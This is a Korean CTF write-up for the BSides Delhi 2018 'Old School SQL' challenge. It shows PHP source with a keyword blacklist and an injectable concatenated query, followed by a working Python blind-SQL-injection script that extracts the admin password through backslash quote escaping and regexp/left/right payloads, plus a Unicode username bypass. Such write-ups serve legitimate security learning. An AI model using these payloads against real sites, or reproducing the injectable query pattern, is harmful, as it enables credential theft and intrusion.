BSides Delhi CTF 2018 Old School SQL

간단한 Sqli이다.

소스는 아래와 같다.

<?php 

include "./config.php";

include "./flag.php";

error_reporting(0);

$black_list = "/admin|guest|limit|by|substr|mid|like|or|char|union|select|greatest|%00|\'|";

$black_list .= "=|_| |in|<|>|-|chal|_|\.|\(\)|#|and|if|database|where|concat|insert|having|sleep/i";

if(preg_match($black_list, $_GET['user'])) exit(":P"); 

if(preg_match($black_list, $_GET['pw'])) exit(":P"); 

$query="select user from chal where user='$_GET[user]' and pw='$_GET[pw]'"; 

$result = mysql_query($query);

$result = mysql_fetch_array($result);

$admin_pass = mysql_fetch_array(mysql_query("select pw from chal where user='admin'"));

echo "<h1>query : <strong><b>{$query}</b></strong><br></h1>";

if($result['user']) echo "<h2>Welcome {$result['user']}</h2>"; 

if(($admin_pass['pw'])&&($admin_pass['pw'] === $_GET['pw'])){

    echo $flag;

}

highlight_file(__FILE__); 

?>

일단 필터가 그다지 빡세지가 않아서 \ , ;%00 , left , right, regexp , /**/ , ||, && 요정도 써서 블라인드로 어드민 패스워드 뽑아주면 된다.

 

그다음 user명에 admin을 지정해줄 때 unicode trick으로 admîn 요런식으로 넣어서 bypass해주면 플래그를 구할 수 있다.

 

import requests

def get_password(payload):
    url = "http://35.200.215.237/"
    params = {'user': '\\','pw':payload}
    response = requests.get(url,params=params)
    if "Welcome admin" in response.text:
        return True
    else:
        return False

def get_flag(user,password):
    url = "http://35.200.215.237/"
    params = {'user':user,'pw':password}
    response = requests.get(url,params=params)
    print response.text


admin_pw = ""
for i in range(1,100):
    for j in range(32,128):
        if chr(j)=="?" or chr(j)=="*":
            continue
        payload = "/**/||/**/user/**/regexp/**/0x5e61646d696e24/**/&&/**/right(left(pw,"+str(i)+"),1)/**/regexp/**/"+hex(j)+";\w00"
        if get_password(payload) == True:
            admin_pw += chr(j)
            break
    if j==127:
        break

get_flag("admîn",admin_pw)